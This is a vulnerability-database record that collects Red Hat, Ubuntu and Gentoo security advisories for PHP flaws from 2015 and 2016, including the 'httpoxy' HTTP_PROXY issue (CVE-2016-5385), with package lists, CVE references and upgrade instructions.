7):\n\nSource:\nphp-5.4.16-36.ael7b_1.src.rpm\n\nppc64le:\nphp-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-cli-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-common-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-gd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-ldap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-odbc-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pdo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-process-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-recode-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-soap-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xml-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nphp-bcmath-5.4.16-36.el7_1.ppc64.rpm\nphp-dba-5.4.16-36.el7_1.ppc64.rpm\nphp-debuginfo-5.4.16-36.el7_1.ppc64.rpm\nphp-devel-5.4.16-36.el7_1.ppc64.rpm\nphp-embedded-5.4.16-36.el7_1.ppc64.rpm\nphp-enchant-5.4.16-36.el7_1.ppc64.rpm\nphp-fpm-5.4.16-36.el7_1.ppc64.rpm\nphp-intl-5.4.16-36.el7_1.ppc64.rpm\nphp-mbstring-5.4.16-36.el7_1.ppc64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.ppc64.rpm\nphp-pspell-5.4.16-36.el7_1.ppc64.rpm\nphp-snmp-5.4.16-36.el7_1.ppc64.rpm\n\ns390x:\nphp-bcmath-5.4.16-36.el7_1.s390x.rpm\nphp-dba-5.4.16-36.el7_1.s390x.rpm\nphp-debuginfo-5.4.16-36.el7_1.s390x.rpm\nphp-devel-5.4.16-36.el7_1.s390x.rpm\nphp-embedded-5.4.16-36.el7_1.s390x.rpm\nphp-enchant-5.4.16-36.el7_1.s390x.rpm\nphp-fpm-5.4.16-36.el7_1.s390x.rpm\nphp-intl-5.4.16-36.el7_1.s390x.rpm\nphp-mbstring-5.4.16-36.el7_1.s390x.rpm\nphp-mysqlnd-5.4.16-36.el7_1.s390x.rpm\nphp-pspell-5.4.16-36.el7_1.s390x.rpm\nphp-snmp-5.4.16-36.el7_1.s390x.rpm\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64le:\nphp-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-dba-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-devel-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-embedded-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-enchant-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-fpm-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-intl-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-pspell-5.4.16-36.ael7b_1.ppc64le.rpm\nphp-snmp-5.4.16-36.ael7b_1.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nphp-5.4.16-36.el7_1.src.rpm\n\nx86_64:\nphp-5.4.16-36.el7_1.x86_64.rpm\nphp-cli-5.4.16-36.el7_1.x86_64.rpm\nphp-common-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-gd-5.4.16-36.el7_1.x86_64.rpm\nphp-ldap-5.4.16-36.el7_1.x86_64.rpm\nphp-mysql-5.4.16-36.el7_1.x86_64.rpm\nphp-odbc-5.4.16-36.el7_1.x86_64.rpm\nphp-pdo-5.4.16-36.el7_1.x86_64.rpm\nphp-pgsql-5.4.16-36.el7_1.x86_64.rpm\nphp-process-5.4.16-36.el7_1.x86_64.rpm\nphp-recode-5.4.16-36.el7_1.x86_64.rpm\nphp-soap-5.4.16-36.el7_1.x86_64.rpm\nphp-xml-5.4.16-36.el7_1.x86_64.rpm\nphp-xmlrpc-5.4.16-36.el7_1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nphp-bcmath-5.4.16-36.el7_1.x86_64.rpm\nphp-dba-5.4.16-36.el7_1.x86_64.rpm\nphp-debuginfo-5.4.16-36.el7_1.x86_64.rpm\nphp-devel-5.4.16-36.el7_1.x86_64.rpm\nphp-embedded-5.4.16-36.el7_1.x86_64.rpm\nphp-enchant-5.4.16-36.el7_1.x86_64.rpm\nphp-fpm-5.4.16-36.el7_1.x86_64.rpm\nphp-intl-5.4.16-36.el7_1.x86_64.rpm\nphp-mbstring-5.4.16-36.el7_1.x86_64.rpm\nphp-mysqlnd-5.4.16-36.el7_1.x86_64.rpm\nphp-pspell-5.4.16-36.el7_1.x86_64.rpm\nphp-snmp-5.4.16-36.el7_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-8142\nhttps://access.redhat.com/security/cve/CVE-2014-9652\nhttps://access.redhat.com/security/cve/CVE-2014-9705\nhttps://access.redhat.com/security/cve/CVE-2014-9709\nhttps://access.redhat.com/security/cve/CVE-2015-0231\nhttps://access.redhat.com/security/cve/CVE-2015-0232\nhttps://access.redhat.com/security/cve/CVE-2015-0273\nhttps://access.redhat.com/security/cve/CVE-2015-2301\nhttps://access.redhat.com/security/cve/CVE-2015-2348\nhttps://access.redhat.com/security/cve/CVE-2015-2783\nhttps://access.redhat.com/security/cve/CVE-2015-2787\nhttps://access.redhat.com/security/cve/CVE-2015-3307\nhttps://access.redhat.com/security/cve/CVE-2015-3329\nhttps://access.redhat.com/security/cve/CVE-2015-3330\nhttps://access.redhat.com/security/cve/CVE-2015-3411\nhttps://access.redhat.com/security/cve/CVE-2015-3412\nhttps://access.redhat.com/security/cve/CVE-2015-4021\nhttps://access.redhat.com/security/cve/CVE-2015-4022\nhttps://access.redhat.com/security/cve/CVE-2015-4024\nhttps://access.redhat.com/security/cve/CVE-2015-4025\nhttps://access.redhat.com/security/cve/CVE-2015-4026\nhttps://access.redhat.com/security/cve/CVE-2015-4147\nhttps://access.redhat.com/security/cve/CVE-2015-4148\nhttps://access.redhat.com/security/cve/CVE-2015-4598\nhttps://access.redhat.com/security/cve/CVE-2015-4599\nhttps://access.redhat.com/security/cve/CVE-2015-4600\nhttps://access.redhat.com/security/cve/CVE-2015-4601\nhttps://access.redhat.com/security/cve/CVE-2015-4602\nhttps://access.redhat.com/security/cve/CVE-2015-4603\nhttps://access.redhat.com/security/cve/CVE-2015-4604\nhttps://access.redhat.com/security/cve/CVE-2015-4605\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFViR1aXlSAg2UNWIIRAuxPAJ42GLQVzvzc9kje0VjDv8NZWcPv6QCbBL+O\ndtqycPWs+07GhjmZ6NNx5Bg=\n=FREZ\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2658-1\nJuly 06, 2015\n\nphp5 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in PHP. \n\nSoftware Description:\n- php5: HTML-embedded scripting language interpreter\n\nDetails:\n\nNeal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL\nbytes in file paths. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-4598)\n\nEmmanuel Law discovered that the PHP phar extension incorrectly handled\nfilenames starting with a NULL byte. (CVE-2015-4021)\n\nMax Spelsberg discovered that PHP incorrectly handled the LIST command\nwhen connecting to remote FTP servers. (CVE-2015-4022,\nCVE-2015-4643)\n\nShusheng Liu discovered that PHP incorrectly handled certain malformed form\ndata. (CVE-2015-4024)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\ndata types. (CVE-2015-4147)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\nthat the uri property is a string. A remote attacker could possibly use these issues to\nobtain sensitive information or cause a denial of service. This issue only affected Ubuntu\n15.04. (CVE-2015-4644)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2\n php5-cgi 5.6.4+dfsg-4ubuntu6.2\n php5-cli 5.6.4+dfsg-4ubuntu6.2\n php5-fpm 5.6.4+dfsg-4ubuntu6.2\n\nUbuntu 14.10:\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6\n php5-cgi 5.5.12+dfsg-2ubuntu4.6\n php5-cli 5.5.12+dfsg-2ubuntu4.6\n php5-fpm 5.5.12+dfsg-2ubuntu4.6\n\nUbuntu 14.04 LTS:\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11\n php5-cgi 5.5.9+dfsg-1ubuntu4.11\n php5-cli 5.5.9+dfsg-1ubuntu4.11\n php5-fpm 5.5.9+dfsg-1ubuntu4.11\n\nUbuntu 12.04 LTS:\n libapache2-mod-php5 5.3.10-1ubuntu3.19\n php5-cgi 5.3.10-1ubuntu3.19\n php5-cli 5.3.10-1ubuntu3.19\n php5-fpm 5.3.10-1ubuntu3.19\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201606-10\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: PHP: Multiple vulnerabilities\n Date: June 19, 2016\n Bugs: #537586, #541098, #544186, #544330, #546872, #549538,\n #552408, #555576, #555830, #556952, #559612, #562882,\n #571254, #573892, #577376\n ID: 201606-10\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in PHP, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. \n\nBackground\n==========\n\nPHP is a widely-used general-purpose scripting language that is\nespecially suited for Web development and can be embedded into HTML. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll PHP 5.4 users should upgrade to the latest 5.5 stable branch, as\nPHP 5.4 is now masked in Portage:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.5.33\"\n\nAll PHP 5.6 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev=lang/php-5.6.19\"\n\nReferences\n==========\n\n[ 1 ] CVE-2013-6501\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501\n[ 2 ] CVE-2014-9705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705\n[ 3 ] CVE-2014-9709\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709\n[ 4 ] CVE-2015-0231\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231\n[ 5 ] CVE-2015-0273\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273\n[ 6 ] CVE-2015-1351\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351\n[ 7 ] CVE-2015-1352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352\n[ 8 ] CVE-2015-2301\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301\n[ 9 ] CVE-2015-2348\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348\n[ 10 ] CVE-2015-2783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783\n[ 11 ] CVE-2015-2787\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787\n[ 12 ] CVE-2015-3329\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329\n[ 13 ] CVE-2015-3330\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330\n[ 14 ] CVE-2015-4021\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021\n[ 15 ] CVE-2015-4022\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022\n[ 16 ] CVE-2015-4025\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025\n[ 17 ] CVE-2015-4026\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026\n[ 18 ] CVE-2015-4147\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147\n[ 19 ] CVE-2015-4148\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148\n[ 20 ] CVE-2015-4642\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642\n[ 21 ] CVE-2015-4643\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643\n[ 22 ] CVE-2015-4644\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644\n[ 23 ] CVE-2015-6831\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831\n[ 24 ] CVE-2015-6832\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832\n[ 25 ] CVE-2015-6833\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833\n[ 26 ] CVE-2015-6834\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834\n[ 27 ] CVE-2015-6835\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835\n[ 28 ] CVE-2015-6836\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836\n[ 29 ] CVE-2015-6837\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837\n[ 30 ] CVE-2015-6838\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838\n[ 31 ] CVE-2015-7803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803\n[ 32 ] CVE-2015-7804\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201606-10\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n",
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VAR-201607-0657
Vulnerability from variot - Updated: 2026-04-10 22:29PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an "httpoxy" issue. Web servers running in a CGI or CGI-like context may assign client request Proxy header values to internal HTTP_PROXY environment variables. This vulnerability can be leveraged to conduct man-in-the-middle (MITM) attacks on internal subrequests or to direct the server to initiate connections to arbitrary hosts. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. There is a security vulnerability in PHP 7.0.8 and earlier versions, the vulnerability stems from the fact that the program does not resolve namespace conflicts in RFC 3875 mode. The program does not properly handle data from untrusted client applications in the HTTP_PROXY environment variable. A remote attacker uses the specially crafted Proxy header message in the HTTP request to exploit this vulnerability to implement a man-in-the-middle attack, directing the server to send a connection to any host.
References:
- CVE-2016-5385 - PHP, HTTPoxy
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: php54-php security update Advisory ID: RHSA-2016:1610-01 Product: Red Hat Software Collections Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1610.html Issue date: 2016-08-11 CVE Names: CVE-2016-5385 =====================================================================
- Summary:
An update for php54-php is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.2) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- (CVE-2016-5385)
Red Hat would like to thank Scott Geary (VendHQ) for reporting this issue.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1353794 - CVE-2016-5385 PHP: sets environmental variable based on user supplied Proxy request header
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source: php54-php-5.4.40-4.el6.src.rpm
x86_64: php54-php-5.4.40-4.el6.x86_64.rpm php54-php-bcmath-5.4.40-4.el6.x86_64.rpm php54-php-cli-5.4.40-4.el6.x86_64.rpm php54-php-common-5.4.40-4.el6.x86_64.rpm php54-php-dba-5.4.40-4.el6.x86_64.rpm php54-php-debuginfo-5.4.40-4.el6.x86_64.rpm php54-php-devel-5.4.40-4.el6.x86_64.rpm php54-php-enchant-5.4.40-4.el6.x86_64.rpm php54-php-fpm-5.4.40-4.el6.x86_64.rpm php54-php-gd-5.4.40-4.el6.x86_64.rpm php54-php-imap-5.4.40-4.el6.x86_64.rpm php54-php-intl-5.4.40-4.el6.x86_64.rpm php54-php-ldap-5.4.40-4.el6.x86_64.rpm php54-php-mbstring-5.4.40-4.el6.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm php54-php-odbc-5.4.40-4.el6.x86_64.rpm php54-php-pdo-5.4.40-4.el6.x86_64.rpm php54-php-pgsql-5.4.40-4.el6.x86_64.rpm php54-php-process-5.4.40-4.el6.x86_64.rpm php54-php-pspell-5.4.40-4.el6.x86_64.rpm php54-php-recode-5.4.40-4.el6.x86_64.rpm php54-php-snmp-5.4.40-4.el6.x86_64.rpm php54-php-soap-5.4.40-4.el6.x86_64.rpm php54-php-tidy-5.4.40-4.el6.x86_64.rpm php54-php-xml-5.4.40-4.el6.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source: php54-php-5.4.40-4.el6.src.rpm
x86_64: php54-php-5.4.40-4.el6.x86_64.rpm php54-php-bcmath-5.4.40-4.el6.x86_64.rpm php54-php-cli-5.4.40-4.el6.x86_64.rpm php54-php-common-5.4.40-4.el6.x86_64.rpm php54-php-dba-5.4.40-4.el6.x86_64.rpm php54-php-debuginfo-5.4.40-4.el6.x86_64.rpm php54-php-devel-5.4.40-4.el6.x86_64.rpm php54-php-enchant-5.4.40-4.el6.x86_64.rpm php54-php-fpm-5.4.40-4.el6.x86_64.rpm php54-php-gd-5.4.40-4.el6.x86_64.rpm php54-php-imap-5.4.40-4.el6.x86_64.rpm php54-php-intl-5.4.40-4.el6.x86_64.rpm php54-php-ldap-5.4.40-4.el6.x86_64.rpm php54-php-mbstring-5.4.40-4.el6.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm php54-php-odbc-5.4.40-4.el6.x86_64.rpm php54-php-pdo-5.4.40-4.el6.x86_64.rpm php54-php-pgsql-5.4.40-4.el6.x86_64.rpm php54-php-process-5.4.40-4.el6.x86_64.rpm php54-php-pspell-5.4.40-4.el6.x86_64.rpm php54-php-recode-5.4.40-4.el6.x86_64.rpm php54-php-snmp-5.4.40-4.el6.x86_64.rpm php54-php-soap-5.4.40-4.el6.x86_64.rpm php54-php-tidy-5.4.40-4.el6.x86_64.rpm php54-php-xml-5.4.40-4.el6.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):
Source: php54-php-5.4.40-4.el6.src.rpm
x86_64: php54-php-5.4.40-4.el6.x86_64.rpm php54-php-bcmath-5.4.40-4.el6.x86_64.rpm php54-php-cli-5.4.40-4.el6.x86_64.rpm php54-php-common-5.4.40-4.el6.x86_64.rpm php54-php-dba-5.4.40-4.el6.x86_64.rpm php54-php-debuginfo-5.4.40-4.el6.x86_64.rpm php54-php-devel-5.4.40-4.el6.x86_64.rpm php54-php-enchant-5.4.40-4.el6.x86_64.rpm php54-php-fpm-5.4.40-4.el6.x86_64.rpm php54-php-gd-5.4.40-4.el6.x86_64.rpm php54-php-imap-5.4.40-4.el6.x86_64.rpm php54-php-intl-5.4.40-4.el6.x86_64.rpm php54-php-ldap-5.4.40-4.el6.x86_64.rpm php54-php-mbstring-5.4.40-4.el6.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm php54-php-odbc-5.4.40-4.el6.x86_64.rpm php54-php-pdo-5.4.40-4.el6.x86_64.rpm php54-php-pgsql-5.4.40-4.el6.x86_64.rpm php54-php-process-5.4.40-4.el6.x86_64.rpm php54-php-pspell-5.4.40-4.el6.x86_64.rpm php54-php-recode-5.4.40-4.el6.x86_64.rpm php54-php-snmp-5.4.40-4.el6.x86_64.rpm php54-php-soap-5.4.40-4.el6.x86_64.rpm php54-php-tidy-5.4.40-4.el6.x86_64.rpm php54-php-xml-5.4.40-4.el6.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source: php54-php-5.4.40-4.el6.src.rpm
x86_64: php54-php-5.4.40-4.el6.x86_64.rpm php54-php-bcmath-5.4.40-4.el6.x86_64.rpm php54-php-cli-5.4.40-4.el6.x86_64.rpm php54-php-common-5.4.40-4.el6.x86_64.rpm php54-php-dba-5.4.40-4.el6.x86_64.rpm php54-php-debuginfo-5.4.40-4.el6.x86_64.rpm php54-php-devel-5.4.40-4.el6.x86_64.rpm php54-php-enchant-5.4.40-4.el6.x86_64.rpm php54-php-fpm-5.4.40-4.el6.x86_64.rpm php54-php-gd-5.4.40-4.el6.x86_64.rpm php54-php-imap-5.4.40-4.el6.x86_64.rpm php54-php-intl-5.4.40-4.el6.x86_64.rpm php54-php-ldap-5.4.40-4.el6.x86_64.rpm php54-php-mbstring-5.4.40-4.el6.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el6.x86_64.rpm php54-php-odbc-5.4.40-4.el6.x86_64.rpm php54-php-pdo-5.4.40-4.el6.x86_64.rpm php54-php-pgsql-5.4.40-4.el6.x86_64.rpm php54-php-process-5.4.40-4.el6.x86_64.rpm php54-php-pspell-5.4.40-4.el6.x86_64.rpm php54-php-recode-5.4.40-4.el6.x86_64.rpm php54-php-snmp-5.4.40-4.el6.x86_64.rpm php54-php-soap-5.4.40-4.el6.x86_64.rpm php54-php-tidy-5.4.40-4.el6.x86_64.rpm php54-php-xml-5.4.40-4.el6.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: php54-php-5.4.40-4.el7.src.rpm
x86_64: php54-php-5.4.40-4.el7.x86_64.rpm php54-php-bcmath-5.4.40-4.el7.x86_64.rpm php54-php-cli-5.4.40-4.el7.x86_64.rpm php54-php-common-5.4.40-4.el7.x86_64.rpm php54-php-dba-5.4.40-4.el7.x86_64.rpm php54-php-debuginfo-5.4.40-4.el7.x86_64.rpm php54-php-devel-5.4.40-4.el7.x86_64.rpm php54-php-enchant-5.4.40-4.el7.x86_64.rpm php54-php-fpm-5.4.40-4.el7.x86_64.rpm php54-php-gd-5.4.40-4.el7.x86_64.rpm php54-php-intl-5.4.40-4.el7.x86_64.rpm php54-php-ldap-5.4.40-4.el7.x86_64.rpm php54-php-mbstring-5.4.40-4.el7.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm php54-php-odbc-5.4.40-4.el7.x86_64.rpm php54-php-pdo-5.4.40-4.el7.x86_64.rpm php54-php-pgsql-5.4.40-4.el7.x86_64.rpm php54-php-process-5.4.40-4.el7.x86_64.rpm php54-php-pspell-5.4.40-4.el7.x86_64.rpm php54-php-recode-5.4.40-4.el7.x86_64.rpm php54-php-snmp-5.4.40-4.el7.x86_64.rpm php54-php-soap-5.4.40-4.el7.x86_64.rpm php54-php-xml-5.4.40-4.el7.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):
Source: php54-php-5.4.40-4.el7.src.rpm
x86_64: php54-php-5.4.40-4.el7.x86_64.rpm php54-php-bcmath-5.4.40-4.el7.x86_64.rpm php54-php-cli-5.4.40-4.el7.x86_64.rpm php54-php-common-5.4.40-4.el7.x86_64.rpm php54-php-dba-5.4.40-4.el7.x86_64.rpm php54-php-debuginfo-5.4.40-4.el7.x86_64.rpm php54-php-devel-5.4.40-4.el7.x86_64.rpm php54-php-enchant-5.4.40-4.el7.x86_64.rpm php54-php-fpm-5.4.40-4.el7.x86_64.rpm php54-php-gd-5.4.40-4.el7.x86_64.rpm php54-php-intl-5.4.40-4.el7.x86_64.rpm php54-php-ldap-5.4.40-4.el7.x86_64.rpm php54-php-mbstring-5.4.40-4.el7.x86_64.rpm php54-php-mysqlnd-5.4.40-4.el7.x86_64.rpm php54-php-odbc-5.4.40-4.el7.x86_64.rpm php54-php-pdo-5.4.40-4.el7.x86_64.rpm php54-php-pgsql-5.4.40-4.el7.x86_64.rpm php54-php-process-5.4.40-4.el7.x86_64.rpm php54-php-pspell-5.4.40-4.el7.x86_64.rpm php54-php-recode-5.4.40-4.el7.x86_64.rpm php54-php-snmp-5.4.40-4.el7.x86_64.rpm php54-php-soap-5.4.40-4.el7.x86_64.rpm php54-php-xml-5.4.40-4.el7.x86_64.rpm php54-php-xmlrpc-5.4.40-4.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.2):
Source: php54-php-5.4.40-4.el7.src.rpm
